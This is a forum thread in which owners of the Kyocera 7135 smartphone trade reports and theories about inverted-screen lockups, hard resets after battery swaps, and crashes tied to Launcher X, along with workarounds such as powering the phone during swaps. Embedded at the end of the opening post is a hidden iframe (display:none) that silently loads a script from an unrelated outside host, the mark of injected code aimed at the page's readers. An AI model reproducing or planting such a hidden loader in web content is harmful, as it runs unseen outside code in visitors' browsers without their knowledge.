+ Reply to Thread

7135's equivalent to the Blue Screen of Death

Today I experienced the dreaded screen of reversed colors. I was trying to make a phone call and the phone wouldn't dial. So, the first thing I tried was to turn the phone-side off and back on again. As soon as I did that, I got the reverse colors. I fiddled with it for a while, ultimately attempting a soft reset which then, quite on it's own, caused the phone to perform a hard reset and I had to reinstall everything from backup. The backup worked fine and everything seems to be working properly again, however it causes me to feel that the OS on this phone is a bit "fragile".

The only thing I can think of that I had done that might have caused this anomaly was to have swapped batteries a short while prior to the problem. I hadn't turned the phone off when I swapped batteries. Could that have caused this problem?

I sure hope this doesn't happen often. It is a PITA!!!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Dave

Interesting. The only hard reset I've had was after I swapped the battery. I also tried the swap with the phone on. I thought it was something I had done by accident, but I now wonder. Other swaps have worked out fine.

This has happened to me three times. All three times, the battery was low (1 bar) but not dead. The first time, I needed to remove the battery from the phone, put it in the cradle without the battery, and wait several minutes. It was able to boot back up, but it had been hard-reset.

The other two times I got the inverse screen, a soft reset re-booted the phone, and I did not lose any data. I was not swapping the battery.

I got the inverted screen this weekend. I came home after my birthday party :drink1 and was low on battery, so I put the phone in the cradle prior to passing out. I wasn't too drunk to make sure the adaptor was plugged in to the back of the cradle, but, alas, I *was* too drunk to check that the adaptor was plugged in to the wall. Next morning, err, afternoon, when I woke up, there was an inverted screen waiting for me any time Launcher X came up. Address book, date book, etc. came up fine so long as I didn't run Launcher X. Once I deleted and reinstalled it (and had a charged battery in the thing), it worked fine.

I suspect it was your "hot" battery swap that did the trick. I always make sure the phone is turned off before changing batteries.
    ---------------
    The same thing we do every night, Pinky...

Administrator
    L X seems to be a member of the errors you guys get.. even some guys with the i330 have issues with L X...

Originally posted by marctronixx
    L X seems to be a member of the errors you guys get.. even some guys with the i330 have issues with L X...
    Since my last 'crash' (I had 3 in 3 days) I have deleted LX and have been golden since...and I REALLY like LX.

Jeff
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

I do have Launcher X, though I have not had any problems with it, except for the one reverse screen on a battery swap. Since that one time, I have not had any other problems and still have LX, so who knows?

If you take the battery out before shutting off the phone it will cause a hard reset. I believe this is suppose to happen.

I see a reverse-screen lockup every time with TealPhone 3.80 if it was the last app in use before going into the Phone app and selecting Phone Preferences. The top line from the Phone app appears above the TealPhone screen. The Phone Preferences app never displays and I must soft-reset the device.

I sent a note to the Launcher X folks regarding the problems we've had. Maybe a few more notes from you might give them incentive to address them.

mailto:support.urgent@launcherx.com
    mailto:support@launcherx.com

Administrator
    Originally posted by RMSko
    If you take the battery out before shutting off the phone it will cause a hard reset. I believe this is suppose to happen.
    this only would do a soft reset.. not a cold boot.

Originally posted by RMSko
    I believe you are right. You always get a warm reset when you change the battery but the instruction manual says to turn the phone off before removing the battery. (Page 64) Avoiding a hard reset is probably the reason why they put that in writing.

Originally posted by Beryl
    I believe you are right. You always get a warm reset when you change the battery but the instruction manual says to turn the phone off before removing the battery. (Page 64) Avoiding a hard reset is probably the reason why they put that in writing.
    A soft reset I can live with, but I don't want to deal with hard resets very often. I'll be sure to turn the phone off before swapping batteries next time.
    Dave

Alternative Solution

After losing 8 new phone numbers because of a hard reset (no reverse screen) caused by swapping batteries and forgetting to HotSync first, I realized that there must be a better way.

If you remove the AC adapter plug from the cradle and plug it directly into the phone when you swap batteries, the phone never loses power, and none of these problems occur. I do this about once every 24 hours with no problems.

Folks,

I don't user Launcher X and I have been having several soft and hard resets. I have an RMA from Kyocera and will return my phone in the next few days.

It seems like a software problem -- but I used the phone with all my third party apps in January and started having this problem a few weeks ago.

I bet it's a software problem (but what do I know). My phone only has the apps that came with it now. I got the "freeze" several times with Eudora e-mail -- twice I did a soft reset and started working again. Two times in the last few days I lost all data.

Looking forward to that new phone from Kyocera....but I think the problem is not my phone....

Glenn

Re: Alternative Solution

Originally posted by mghaffar
    After losing 8 new phone numbers because of a hard reset (no reverse screen) caused by swapping batteries and forgetting to HotSync first, I realized that there must be a better way.

If you remove the AC adapter plug from the cradle and plug it directly into the phone when you swap batteries, the phone never loses power, and none of these problems occur. I do this about once every 24 hours with no problems.
    That sounds like a good idea. Thanks for the suggestion!
    Dave

I got the inverse screen lockup again. For the second time, it happened when I pressed the "Home" button (the icon that looks like the house to the upper left of the graffiti screen). The battery was almost fully charged, and I was not changing it.